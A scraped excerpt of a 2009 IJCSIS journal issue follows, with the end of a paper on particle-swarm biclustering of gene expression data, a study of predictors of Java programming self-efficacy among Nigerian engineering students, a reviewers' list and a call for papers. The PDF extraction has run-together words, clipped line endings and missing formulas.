In our method, MOPSO with crowding distance is used forsolving this problem and it cooperates with local search to findbetter solution. Since this problem has a constraint (13), wedon't apply this constraint when particle move in search space.We allow particle move without any constraint in search spaceso that they can be stronger to discover new solutions but weadd particle to archive if they verity constraint and also aparticle is as gbest if constraint is true for it. The problem withoverlap among biclusters is addressed in our method as below:
First the archive size equals to 100.After the motion andupdate of archive, only 50 numbers of particles in the archivethat have minimum overlap, move to next generation. So
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 199/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009
archive with variable size is used. Then in next generation theelements that can be selected as gbest have minimum overlap.
We encode bicluster as particle like [4, 9,13]. Each particlein swarm encodes one bicluster. Biclusters are encoded by
means of binary strings of length N+M, where N and M are thenumber of rows (genes) and number of columns (conditions)respectively. In each particle the first N bits of the binary stringare related to genes and the remaining M bits are related toconditions. If a bit is set to 1, it means the related gene orcondition belongs to the encoded bicluster; otherwise is doesnot.
A general scheme of our algorithm is given in figure3.Population is randomly initialized and velocity of each particlein each dimension is set to zero. Then non-dominatedpopulation is inserted in archive, after that, we use a localsearch algorithm to move archive in feasible region. We useCheng and Church algorithm as local search. The local searchalgorithm starts with a given bicluster. The irrelevant genes or
conditions having mean squared residue above (or below) acertain threshold are now selectively eliminated (or added)using the following conditions [1]. A “node” refers to a gene ora condition. This algorithm contains three phases: multiplenode deletion phase, single node deletion phase and multiplenode addition phase.
• Multiple nodes deletion :
a) Compute r IJ ,e Ij ,eiJ ,e IJ of the biclusters by (1)–(5).
b) Remove all genes i∈ I satisfying
c) Recompute r IJ ,e Ij ,eiJ ,e IJ .
d) Remove all conditions j∈ J satisfying
• Single node deletion,
a) Recompute r IJ ,e Ij ,eiJ ,e IJ .
b) Remove the node with largest mean squared
residue (done for both gene and condition), one
at a time, until the mean squared residue drops
below δ .
• Multiple nodes addition.
a) Recompute r IJ ,e Ij ,eiJ ,e IJ .
b) Add all conditions j∉ J with
Figure 2. The effects of local search in Multi-Objective optimization(f1 and
f2 must be minimaze)
c)
Recompute rIJ ,eIj,eiJ,eIJ .d) Add all genes i∉ I with
This local search is used for particle in the archive. Theeffects of using local search are illustrated in Fig.2, where thedecrement of objective functions is obvious.
Figure 3. A general scheme of our algorithm
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 200/215
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 201/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009
TABLE III. HUMAN BICLUSTERS
Bicluster Genes Conditions Residue Row variance
1 1053 36 997.68 2463.42
27 839 42 1074.38 3570.61
49 105 81 1197.05 2885.34
73 487 22 769.56 5408.31
92 105 93 1007.41 7628.44
TABLE IV. COMPARATIVE WITH OTHER METHOD
Method Avg size Avg
residue
Avg genes Avg
condition
Max
size
NAGA 2 33463.70 987.56 915.81 36.54 37560
SEEA 2 B 29874.8 1128.1 784.68 35.48 29654MOPSOB 34012.24 927.47 902.41 40.12 37666
OUR
Method
33983.64 946.78 1006.23 42.02 37908
VI. CONCLUSIONS
In this paper, we introduced an algorithm based on Multi-Objective PSO while incorporating local search for findingbiclusters on expression data. In biclustering problem severalobjective have to be optimized simultaneously. We must find
maximum biclusters with lower mean score residue and highrow variance. These three objectives are in conflict with eachother. We apply hybrid MOPSO and we use crowding distancefor maintain diversity. In addition we consider a low level of overlap among biclusters by using archive with variable size. Acomparative assessment of results is provided on bench mark gene expression data set to demonstrate the effectiveness of theproposed method. Experimental results show that proposedmethod is able to find interesting biclusters on expression dataand comparative analysis show better performance in result.
Trying other Multi-Objective methods such as thesimulated annealing, or employing a neural network in archiveclustering can be suggested as future work. Again, decimalencoding of particles may be attempted.
REFERENCES
[1] Y. Cheng and G.M. Church, “Biclustering of Expression Data, ” Proc.Eighth Int’l Conf. Intelligent Systems for Molecular Biology,pp. 93-103,2000.
[2] Stanislav Busygina, Oleg Prokopyevb, Panos M. Pardalosa,“Biclustering in data mining, ” Computers & Operations Research,35,pp2964 – 2987,2008.
[3] Sara C. Madeira and Arlindo L. Oliveira, “Biclustering algorithms forbiological data analysis: a survey,” IEEE/ACM Transactions on Computational Biology and Bioinformatics, vol. 1, no. 1, pp. 24-45,2004.
[4] F. Divina and J. S. Aguilar-Ruiz. Biclustering of expression data withevolutionary computation,” IEEE Transactions on Knowledge & DataEngineering, 18(5):590–602, 2006.
[5] J. Kennedy and R. Eberhart, “Particle swarm optimization,” NeuralNetworks, 1995. Proceedings., IEEE International Conference on, vol. 4,1995.
[6] MAPSO2007.
[7] Kwang Y. Lee and Mohamed A. El-Sharkawi,“Modern heuristisoptimization techniques,” IEEE Press, ,2008
[8] A.A. Alizadeh, M.B. Eisen, R.E. Davis, C. Ma, I.S.Lossos, A.Rosenwald, J.C. Boldrick, H. Sabet, T. Tran and X.Yu, “Distinct typesof diffuse large B-cell lymphoma identified by gene expressionprofiling,” Nature, vol. 403,2000, pp. 503-511.
[9] S. Mitra and H. Banka, “Multi-objective evolutionary biclustering of gene expression data,” Pattern Recognition,vol. 39, no. 12, 2006, pp.2464-2477.
[10] M. Reyes-Sierra and C.A.C. Coello, “Multi-Objective Particle SwarmOptimizers: A Survey of the State-of-the-Art,” International Journal of Computational Intelligence Research,vol. 2, no. 3, pp. 287-308,2006.
[11] J. Kennedy and R.C. Eberhart, “A discrete binary version of the particleswarm algorithm,” Systems, Man, and Cybernetics, 1997.'Computational
Cybernetics and Simulation'., 1997 IEEE International Conference on,vol. 5,1997.
[12] K. Deb, S. Agarwal, A. Pratap, and T. Meyarivan, “A fast and elitistmulti-objective genetic algorithm : NSGA-II,” IEEE Transactions onEvolutionary Computation, vol. 6, pp. 182–197, 2002.
[13] Junwan Liu, Zhoujun Li, Feifei Liu and Yiming Chen “Multi-ObjectiveParticle Swarm Optimization Biclustering of Microarray Data, ” IEEEInternational Conference on Bioinformatics and Biomedicine, pp.363-366,2008
[14] A. Ben-Dor, R. Shamir, and Z. Yakhini, “Clustering Gene ExpressionPatterns,” J. Computational Biology, vol. 6, nos. 3-4, pp. 281-297, 1999.
[15] G. Getz, E. Levine, and E. Domany, “Coupled Two-Way ClusteringAnalysis of Gene Microarray Data,” Proc. NaturalAcademy of SciencesUSA, pp. 12,079-12,084, 2000.
AUTHORS PROFILE
Seyed Amirhassan Monadjemi, born 1968, in Isfahan, Iran. He got his PhD
in computer engineering, pattern recognition and image processing, fromUniversity of Bristol, Bristol, England, in 2004. He is now working as a
lecturer at the Department of Computer, University of Isfahan, Iran. His
research interests include pattern recognition, image processing,
human/machine analogy, and physical detection and elimination of viruses.
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 202/215
PREDICTORS OF JAVA PROGRAMMING SELF–EFFICACY AMONG
ENGINEERING STUDENTS IN A NIGERIAN UNIVERSITY
By
Philip Olu Jegede, PhD
Institute of Education
Obafemi Awolowo University, Ile-Ife, Nigeria
ABSTRACT
The study examined the relationship between Java programming self-efficacy and programming background of
engineering students in a Nigerian University. One hundred and ninety two final year engineering students
randomly selected from six engineering departments of the university participated in the study. Two research
instruments: Programming Background Questionnaire and Java Programming Self-Efficacy Scale were used in
collecting relevant information from the subjects. The resulting data were analyzed using Pearson product
correlation and Multiple regression analysis. Findings revealed that Java Programming self-efficacy has no
significant relationship with each of the computing and programming background factors. It was additionally
obtained that the number of programming courses offered and programming courses weighed scores were the onl
predictors of Java self-efficacy.
INTRODUCTION
In a recent study, Askar and Davenport [1] identified variables that are related to self-efficacy of engineerin
students in Turkey, concluding with factors such as gender, computer experience, and family usage of computer
The importance of the study was based on the necessity of computer skills for today’s engineering profession
practices and the factors that would affect their ability to acquire programming skills. However literatures an
classroom experience have suggested other factors that may be associated or impact upon programming sel
efficacy. For example Romalingans, La Belle and Wiedenbeck [2] posited that programming self-efficacy is ofte
influenced by previous programming experience as well as mental modeling.
Bandura [3] posited that judgments of self-efficacy are based on four sources of information. The sources include
individual performance attainments, experiences of observing the performance of others, experiences of observin
the performance of others, verbal persuasion and psychological reactions that people use partly to judge the
capability. This is also applicable to programming domain. Performance attainment in this context can
measured by the scores of students in programming courses. In other words if students had persistently score
reasonably in previous programming courses, they tend to increase in their self efficacy. If research can identif
predicting factors of programming self-efficacy, the problem of poor performance in programming as well as th
of approach avoidance of programming in the future professional practice can be solved particularly amon
engineers of today as they are daily confronted with tasks that are computer and software driven. Studi
identifying discrete factors that are related to programming self efficacy are lacking in Nigeria. Identifying succe
IJCSIS, International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
196 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 203/215
criteria for computer programmers can help improve training and development programs in academic an
industrial settings [4]. However no study can investigate the self-efficacy of all programming languages at a tim
Thus this study starts with Java programming language as one of the object oriented languages recently introduce
into the curricula of some engineering departments in Nigeria. Other object-oriented programming language
replacing the procedural ones in the old curricula include Matlab, C++ and C#. The goal of this work therefore is
study Java self-efficacy of engineering students by exploring the relationship between Java self-efficacy and eacof computing background, programming experience in years and programming courses weighed scores, number
programming courses taken. The study also seeks to investigate their combined influence on Java self-efficac
Specifically; the study will answer the following questions.
1. What is the relationship between Java self-efficacy and each of computing background,
Programming experience, programming weighed scores and number of programming courses taken?
2. Will a combination of these selected factors significantly predict Java self-efficacy?
3. What is the proportion of variance in Java self-efficacy accounted for by the linear
combination of the factors; computing experience, programming experience, programming
weighed score and number of programming courses taken?
4. What is the relative contribution of each factor in the prediction of Java self-efficacy?
METHOD
One hundred and ninety two final year students who offered programming randomly selected from six engineerin
departments of Obafemi Awolowo University, Ile-Ife, Nigeria participated in the study. These include
Mechanical, Civil, Metallurgy and Material Engineering departments; others include Electrical, Chemical an
Computer Science and Engineering departments.
Two research instruments were employed to collect relevant data from the students. These were Programmin
Background Questionnaire (PBQ) and Java Programming Self-efficacy Scale (JPSES). PBQ was designed
obtain information on engineering students programming experience, number of programming courses previous
undergone and scores obtained in those programming courses. JPSES was developed from the comput
programming self-efficacy scale of Ramalingam and Wiedenbeck [2] by Askar and Davenport [1]
Participants were to rate their confidence in performing some specified Java programming related tasks. Th
confidence was to be rated for each item in a seven –point Likert scale as following: Not confident at all (1
Mostly not confident (2), Slightly confident (3), Averagely confident (4), Fairly confident (5), Mostly confide
(6), Absolutely confident (7). Total score obtainable on the said efficacy scale was 224 while the minimum scor
totaled 32.The instruments were administered on the students with the assistance of their lecturers. The resultin
data were analyzed using Pearson product correlation and Multiple regression Analysis.
IJCSIS, International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
197 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 204/215
RESULTS
Table 1: Relationship between Java self-efficacy and Computing and Programming
Background
Computing
Experience
Year of First
Programming
Weighed Score in
ProgrammingCourses
Number of
ProgrammingCourses taken
Java Self-
Efficacy
-.029 .099 .278 .453
From Table 1, the correlated coefficient between Java programming self-efficacy and each of computin
experience, year of first programming, weighed scores in programming courses and number of programmin
courses taken were each found to be r= -.029, .099, .278 and.453. The relationship was not significant at .05 lev
of significance.
Table 2: Summary of Analysis of Variance of Programming Background and Java Programming Self-
Efficacy
ANOVAb
Source of
Variance Sum of Squares Df Mean Square F Sig.
Regression 148157.887 4 37039.472 19.821 .000a
Residual 351306.828 188 1868.653
1
Total 499464.715 192
Table 3: Summary of Multiple Regression Analysis of the Relationship between Java
Programming Self-Efficacy and Programming Background
Variables Entered R R Square Adjusted R Square Std. Error of the Estimate
Sig.
Experience in computingYear of first programming
Nunmber of program
Average score
.545a
.297 .282 43.22792 .000
IJCSIS, International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
198 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 205/215
Table 4: Significant tests of Regression Weights of Independent Variables
Coefficientsa
Unstandardized Coefficients
Standardized
Coefficients
Model B Std. Error Beta T Sig.
(Constant) -80.003 24.752 -3.232 .001
Experience in computing -4.758 3.530 -.085 -1.348 .179
year of first programming 1.950 2.568 .047 .759 .449
Number of program 26.548 3.530 .469 7.520 .000
1
Average score 1.482 .337 .272 4.397 .000
a. Dependent Variable: Java self efficacy
To verify whether a combination of the computing and programming related background variables w
significantly predict Java self-efficacy, data obtained from programming background questionnaires and Java sel
efficacy scale were subjected to multiple regression analysis. Table 2 shows the summary of the analysis
variance of the independent variables in the regression procedures.
The results in Table 2 show that the analysis of variance of the multiple regression data yielded an F-ratio
19.821 which is significant at .05 level. This implies that a combination of the independent variables (i
Computing experience, programming experience in years, number of programming courses taken and the averag
score in the programming courses) is significantly related to Java self-efficacy of the engineering students.
The results of the regression analysis on the relationship between the dependent variable and the combination o
the four independent variables are as stated in Table 3, the table shows that using the four independent variabl
(computing experience, year of first programming number of programming courses and the average score
programming courses) to predict Java programming self-efficacy gives a coefficient of multiple regression ® o
.545 and a multiple correlation square (R2) of .297. These values are statistically significant at .05 level, whic
suggests that only 29.7 percent of the variance of Java self-efficacy were explained by the by the combination
the four independent variables. Further attempt was made to determine the relative power of each of th
independent variables to predict Java self-efficacy of engineering students. Table 4 shows, for each of th
variables, Error of Estimate (SEB), Beta, T-ratio and the level at which T-ratio is significant.
From the table, the number of programming courses taken and the average score in programming courses taken ha
t-values of 7.520 and 4.397 respectively. The values of Beta-weights for the two variables are .469 and .272
respectively. These values are significant at .05 level of confidence which implies that the two variables contribut
majorly to the prediction of Java self-efficacy. From the values of Beta weights and t-ratios for each independent
variable, it is clear that the number of programming courses offered had the highest impact in the prediction of Jav
IJCSIS, International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
199 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 206/215
programming self-efficacy followed by the average score of the programming courses offered. Year of first
programming and experience in computing had t-values and Beta weights that are not significant at the .05 level.
Summarily, it could be said that the number of programming courses taken and the average score of programmin
courses offered by engineering students had significant contributions to the prediction of Java self-efficacy, the
weights of experience in computing and year of first programming demonstrated week contribution
DISCUSSION
The study founds that the number of programming courses offered by students and their achievements in th
programming courses (based on scores) significantly predict their Java programming self-efficacy. This appe
consistent with the position of Wiedenbeck [5] who obtained that previous programming experience affecte
perceived self-efficacy on one hand and that perceived self-efficacy in programming also affected performance
programming courses.
In an earlier study Ramalingan, La Belle and Wiedenbeck [2] had come out with the results that self-efficacy f
programming were influenced by previous programming experience. Bandura [3] also opined that self-efficac
perceptions develop gradually with the attainment of skills and experience. The fact that self-efficacy
programming domain becomes predictable by performance in programming course is logical. This is becau
learners with high self-efficacy are more likely to undertake challenging tasks and to expend considerably great
efforts to complete them in the face of unexpected difficulties, than those with lower self-efficacy [1]
However, the number of years a student had been introduced to programming did not significantly predict Jav
self-efficacy. This can be understood in this way; experiences in programming by years may not necessary imp
continuous active programming experience for example many of the engineering students in the vario
departments used for the study did offer for the first time programming courses in their second year. The seconda
school curriculum in Nigeria do not accommodate programming content and it would be quite unlikely th
students took initiative to learn programming on their own before gaining admission into the university. Thus th
subjects used for the study appear to experience programming approximately around the same time. Apart fro
this, students might not get involved in programming except in the semester during which programming as a cours
was compulsory, hence years of programming experience did not predict Java self-efficacy.Similarly, years
computing experience did not predict Java self-efficacy, this is perhaps because the substantial part of the skil
IJCSIS, International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
200 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 207/215
acquired in the course of students encounter with computers used for the study were not in programming domai
Rather many of these skills were internet and word processing-related. This opposed the findings of Ask
&Davenport [1] who posited that the number of years of experience a student had with computers had a significa
linear contribution to their self-efficacy scores.
The findings above have pedagogical implications. Educational researchers recognize that because skills and sel
efficacy are so interwined,one way of improving student performance is to improve student self efficacy [6
Wiendebeck,et al,[6] believed that students must steadily carry out tasks of increasing difficulty, until they have
history of solid attainments. Expounding more on this idea, increasing performance through self efficacy
programming courses will necessitate the following;
(i) More assignments at the beginning of the programming courses than at the end of the semester. The assignme
should move gradually from simple to complex given severally. Observation has shown that instructors often
wait till the end of the semester (i.e. close to the examination) before giving students assignments. But when
assignments are given severally at the beginning of the course, confidence of students become boosted
particularly when the assignments are undertaken with success.
(ii) Prompt feedbacks must be ensured; even when students undertake regular assignment and their scores are not
made known promptly, reason(s) for the assignments become defeated, on the other hand performance
accomplishment becomes assured when students receive prompt feedback with success scores thereby leading
to higher self-efficacy.
(iii) In the course of instructional lessons, group work in programming classes would help increase self efficac
This is because experiences of observing the performance of others give rise to self efficacy. This is as posited b
Bandura [3].
CONCLUSION
This study obtained that weighed scores in programming courses and the number of programming courses offere
by engineering students were the significant predictors in Java programming self-efficacy. This study also finds n
significant relationship between Java programming self-efficacy and each of engineering students computin
IJCSIS, International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
201 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 208/215
background and years of first programming. Further studies are needed in identifying factors that will better predi
Java self efficacy. In addition to this, the study need be replicated for other object oriented languages current
introduced into the curriculum. A possible limitation of the study was that the scores obtained in programmin
courses did not derive from standardized tests. They were proceeds of teacher-made tests with their inhere
weaknesses.
ACKNOWLEDGEMENT
The study acknowledged Askar & Davenport [1] whose works provided an instrument and inspiration for th
effort.
REFERENCES
[1] Askar. P. & Davenport, D (2009). An investigation of factors related to self-efficacy for Java
Programming Among Engineering Students. Turkish Online Journal of Education Technology 8(1)
[2] Ramalingam, V. & Wiedenbeck S. (1998). Development and Validation of Scores on a
Computer Programming Self-Efficacy Scale and Group Analysis of Novice Programmer
Self-Efficacy. Journal of Educational Computing Research. 19(4), 367-386
[3] Bandura, A (1986). Social Foundations of Thought and Action; A Social cognitive Theory,Prentice Hall, Eaglewood Cliffs, NJ.
[4] Sterling, G.D. & Brinthaupt T.M. (2004). Faculty and Industry Conceptions of SuccessfulComputer Programmers. Journal of Information Systems Education, 14(4).
[5] Wiedenbeck, S. (2005). Factors affecting the success of non-majors in learning to program.
Proceedings of the first International Workshop on Computing Education Research. Seatle, 13-24.
[6] Wiedenbeck.S,LaBelle.D&Kain.V.N.R(2004).Factors Affecting Course Outcomes in Introductory
Programming.Proceedings of the 16 th
Workshop of the Psychology of Programming Interest Group.CarlowIreland, 97-110
AUTHOR’S PROFILE
Dr Philip Jegede is an Associate Professor in the Institute of Education of Obafemi Awolowo University,Ile-
Ife,Nigeria.He holds both Bachelor and Master of Science degrees in Mathematics from University of Lagos,Nigeria.He later ventured into the field of Education by enrolling and completing a Master of
Education and consequently a PhD degree in Curriculum Studies with focus in ICT. His research interest
in Computer Education. Before his present appointment, he had lectured in a College of Education and a
Polytechnic School.
IJCSIS, International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
202 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 209/215
IJCSIS REVIEWERS’ LIST
1. Dr. Lam Hong Lee, Universiti Tunku Abdul Rahman, Malaysia
2. Assoc. Prof. N. Jaisankar, VIT University, Vellore,Tamilnadu, India
3. Dr. Amogh Kavimandan, The Mathworks Inc., USA
4. Dr. Ramasamy Mariappan, Vinayaka Missions University, India
5. Dr. Neeraj Kumar, SMVD University, Katra (J&K), India
6. Dr. Junjie Peng, Shanghai University, P. R. China
7. Dr. Ilhem LENGLIZ, HANA Group - CRISTAL Laboratory, Tunisia
8. Prof. Dr. Durgesh Kumar Mishra, Acropolis Institute of Technology and Research, Indore, MP, India
9. Prof. Dr.C.Suresh Gnana Dhas, Anna University, India
10. Prof. Pijush Biswas, RCC Institute of Information Technology, India
11. Dr. A. Arul Lawrence, Royal College of Engineering & Technology, India
12. Mr. Wongyos Keardsri, Chulalongkorn University, Bangkok, Thailand13. Mr. Somesh Kumar Dewangan, CSVTU Bhilai (C.G.)/ Dimat Raipur, India
14. Mr. Hayder N. Jasem, University Putra Malaysia, Malaysia
15. Mr. A.V.Senthil Kumar, C. M. S. College of Science and Commerce, India
16. Mr. R. S. Karthik, C. M. S. College of Science and Commerce, India
17. Mr. P. Vasant, University Technology Petronas, Malaysia
18. Mr. Wong Kok Seng, Soongsil University, Seoul, South Korea
19. Mr. Praveen Ranjan Srivastava, BITS PILANI, India
20. Mr. Kong Sang Kelvin, The Hong Kong Polytechnic University, Hong Kong
21. Mr. Mohd Nazri Ismail, Universiti Kuala Lumpur, Malaysia
22. Dr. Rami J. Matarneh, Al-isra Private University, Amman, Jordan
23. Dr Ojesanmi Olusegun Ayodeji, Ajayi Crowther University, Oyo, Nigeria
24. Dr. Siddhivinayak Kulkarni, University of Ballarat, Ballarat, Victoria, Australia
25. Dr. Riktesh Srivastava, Skyline University, UAE
26. Dr. Oras F. Baker, UCSI University - Kuala Lumpur, Malaysia
27. Dr. Ahmed S. Ghiduk, Faculty of Science, Beni-Suef University, Egypt
and Department of Computer science, Taif University, Saudi Arabia
28. Assist. Prof. Tirthankar Gayen, CIT, West Bengal University of Technology, India
29. Ms. Huei-Ru Tseng, National Chiao Tung University, Taiwan
30. Prof. Ning Xu, Wuhan University of Technology, China
31. Mr Mohammed Salem Binwahlan, Hadhramout University of Science and Technology, Yemen &
Universiti Teknologi Malaysia, Malaysia.
32. Dr. Aruna Ranganath, Bhoj Reddy Engineering College for Women, India
33. Mr. Hafeezullah Amin, Institute of Information Technology, KUST, Kohat, Pakistan
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 210/215
34. Prof. Syed S. Rizvi, University of Bridgeport, USA
35. Mr. Shahbaz Pervez Chattha, University of Engineering and Technology Taxila, Pakistan
36. Dr. Shishir Kumar, Jaypee University of Information Technology, Wakanaghat (HP), India
37. Mr. Shahid Mumtaz, Portugal Telecommunication, Instituto de Telecomunicações (IT), Aveiro
38. Mr. Rajesh K Shukla, Corporate Institute of Science & Technology Bhopal M P
39. Dr. Poonam Garg, Institute of Management Technology, India
40. Mr. S. Mehta, Inha University, Korea
41. Mr. Dilip Kumar S.M, University Visvesvaraya College of Engineering (UVCE), Bangalore
University
42. Prof. Malik Sikander Hayat Khiyal, Fatima Jinnah Women University, Rawalpindi, Pakistan
43. Dr. Virendra Gomase , Department of Bioinformatics, Padmashree Dr. D.Y. Patil University
44. Dr. Irraivan Elamvazuthi, University Technology PETRONAS, Malaysia
45. Mr. Saqib Saeed, University of Siegen, Germany
46. Mr. Pavan Kumar Gorakavi, IPMA-USA [YC]47. Dr. Ahmed Nabih Zaki Rashed, Menoufia University, Egypt
48. Prof. Shishir K. Shandilya, Rukmani Devi Institute of Science & Technology, India
49. Mrs.J.Komala Lakshmi, SNR Sons College, Computer Science, India
50. Mr. Muhammad Sohail, KUST, Pakistan
51. Dr. Manjaiah D.H, Mangalore University, India
52. Dr. S Santhosh Baboo, D.G.Vaishnav College, Chennai, India
53. Assist. Prof. Sugam Sharma, NIET, India / Iowa State University, USA
54. Jorge L. Hernández-Ardieta, University Carlos III of Madrid, Spain
55. Prof. Dr. Mokhtar Beldjehem, Sainte-Anne University, Halifax, NS, Canada
56. Dr. Deepak Laxmi Narasimha, VIT University, India
57. Prof. Dr. Arunkumar Thangavelu, Vellore Institute Of Technology, India
58. Mr. M. Azath, Anna University, India
59. Mr. Md. Rabiul Islam, Rajshahi University of Engineering & Technology (RUET), Bangladesh
60. Dr. Shimon K. Modi, Director of Research BSPA Labs, Purdue University, USA
61. Mr. Aos Alaa Zaidan Ansaef , Multimedia University, Malaysia
62. Dr Suresh Jain, Professor (on leave), Institute of Engineering & Technology, Devi Ahilya University,
Indore (MP) India,
63. Mr. Mohammed M. Kadhum, Universiti Utara Malaysia
64. Mr. Hanumanthappa. J. , University of Mysore, India
65. Mr. Syed Ishtiaque Ahmed, Bangladesh University of Engineering and Technology (BUET)
66. Mr Akinola Solomon Olalekan, University of Ibadan, Ibadan, Nigeria
67. Mr. Santosh K. Pandey, Department of Information Technology, The Institute of Chartered
Accountants of India
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 211/215
68. Dr. P. Vasant, Power Control Optimization, Malaysia
69. Dr. Petr Ivankov, Automatika - S, Russian Federation
70. Dr. Utkarsh Seetha, Data Infosys Limited, India
71. Mrs. Priti Maheshwary, Maulana Azad National Institute of Technology, Bhopal
72. Dr. (Mrs) Padmavathi Ganapathi, Avinashilingam University for Women, Coimbatore
73. Assist. Prof. A. Neela madheswari, Anna university, India
74. Prof. Ganesan Ramachandra Rao, PSG College of Arts and Science, India
75. Mr. Kamanashis Biswas, Daffodil International University, Bangladesh
76. Dr. Atul Gonsai, Saurashtra University, Gujarat, India
77. Mr. Angkoon Phinyomark, Prince of Songkla University, Thailand
78. Mrs. G. Nalini Priya, Anna University, Chennai
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 212/215
CALL FOR PAPERS
International Journal of Computer Science and Information Security
IJCSIS 2009-2010
ISSN: 1947-5500
http://sites.google.com/site/ijcsis/
International Journal Computer Science and Information Security, now at its fourth edition, is the premier
scholarly venue in the areas of computer science and security issues. IJCSIS 2009-2010 will provide a high
profile, leading edge platform for researchers and engineers alike to publish state-of-the-art research in the
respective fields of information technology and communication security. The journal will feature a diverse
mixture of publication articles including core and applied computer science related topics.
Authors are solicited to contribute to the special issue by submitting articles that illustrate research results,
projects, surveying works and industrial experiences that describe significant advances in the following
areas, but are not limited to. Submissions may span
a broad range of topics, e.g.:
Track A: Security
Access control, Anonymity, Audit and audit reduction & Authentication and authorization, Applied
cryptography, Cryptanalysis, Digital Signatures, Biometric security, Boundary control devices,
Certification and accreditation, Cross-layer design for security, Security & Network Management, Data and
system integrity, Database security, Defensive information warfare, Denial of service protection, Intrusion
Detection, Anti-malware, Distributed systems security, Electronic commerce, E-mail security, Spam,
Phishing, E-mail fraud, Virus, worms, Trojan Protection, Grid security, Information hiding and
watermarking & Information survivability, Insider threat protection, Integrity
Intellectual property protection, Internet/Intranet Security, Key management and key recovery, Language-
based security, Mobile and wireless security, Mobile, Ad Hoc and Sensor Network Security, Monitoring
and surveillance, Multimedia security ,Operating system security, Peer-to-peer security, Performance
Evaluations of Protocols & Security Application, Privacy and data protection, Product evaluation criteria
and compliance, Risk evaluation and security certification, Risk/vulnerability assessment, Security &Network Management, Security Models & protocols, Security threats & countermeasures (DDoS, MiM,
Session Hijacking, Replay attack etc,), Trusted computing, Ubiquitous Computing Security, Virtualization
security, VoIP security, Web 2.0 security, Submission Procedures, Active Defense Systems, Adaptive
Defense Systems, Benchmark, Analysis and Evaluation of Security Systems, Distributed Access Control
and Trust Management, Distributed Attack Systems and Mechanisms, Distributed Intrusion
Detection/Prevention Systems, Denial-of-Service Attacks and Countermeasures, High Performance
Security Systems, Identity Management and Authentication, Implementation, Deployment and
Management of Security Systems, Intelligent Defense Systems, Internet and Network Forensics, Large-
scale Attacks and Defense, RFID Security and Privacy, Security Architectures in Distributed Network
Systems, Security for Critical Infrastructures, Security for P2P systems and Grid Systems, Security in E-
Commerce, Security and Privacy in Wireless Networks, Secure Mobile Agents and Mobile Code, Security
Protocols, Security Simulation and Tools, Security Theory and Tools, Standards and Assurance Methods,
Trusted Computing, Viruses, Worms, and Other Malicious Code, World Wide Web Security, Novel andemerging secure architecture, Study of attack strategies, attack modeling, Case studies and analysis of
actual attacks, Continuity of Operations during an attack, Key management, Trust management, Intrusion
detection techniques, Intrusion response, alarm management, and correlation analysis, Study of tradeoffs
between security and system performance, Intrusion tolerance systems, Secure protocols, Security in
wireless networks (e.g. mesh networks, sensor networks, etc.), Cryptography and Secure Communications,
Computer Forensics, Recovery and Healing, Security Visualization, Formal Methods in Security, Principles
for Designing a Secure Computing System, Autonomic Security, Internet Security, Security in Health Care
Systems, Security Solutions Using Reconfigurable Computing, Adaptive and Intelligent Defense Systems,
Authentication and Access control, Denial of service attacks and countermeasures, Identity, Route and
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 213/215
Location Anonymity schemes, Intrusion detection and prevention techniques, Cryptography, encryption
algorithms and Key management schemes, Secure routing schemes, Secure neighbor discovery and
localization, Trust establishment and maintenance, Confidentiality and data integrity, Security architectures,
deployments and solutions, Emerging threats to cloud-based services, Security model for new services,
Cloud-aware web service security, Information hiding in Cloud Computing, Securing distributed data
storage in cloud, Security, privacy and trust in mobile computing systems and applications, Middleware
security & Security features: middleware software is an asset on its own and has to be protected, interaction between security-specific and other middleware features, e.g.,
context-awareness, Middleware-level security monitoring and measurement: metrics and mechanisms
for quantification and evaluation of security enforced by the middleware, Security co-design: trade-off and
co-design between application-based and middleware-based security, Policy-based management:
innovative support for policy-based definition and enforcement of security concerns, Identification and
authentication mechanisms: Means to capture application specific constraints in defining and enforcing
access control rules, Middleware-oriented security patterns: identification of patterns for sound, reusable
security, Security in aspect-based middleware: mechanisms for isolating and enforcing security aspects,
Security in agent-based platforms: protection for mobile code and platforms, Smart Devices: Biometrics,
National ID cards, Embedded Systems Security and TPMs, RFID Systems Security, Smart Card Security,
Pervasive Systems: Digital Rights Management (DRM) in pervasive environments, Intrusion Detection and
Information Filtering, Localization Systems Security (Tracking of People and Goods), Mobile Commerce
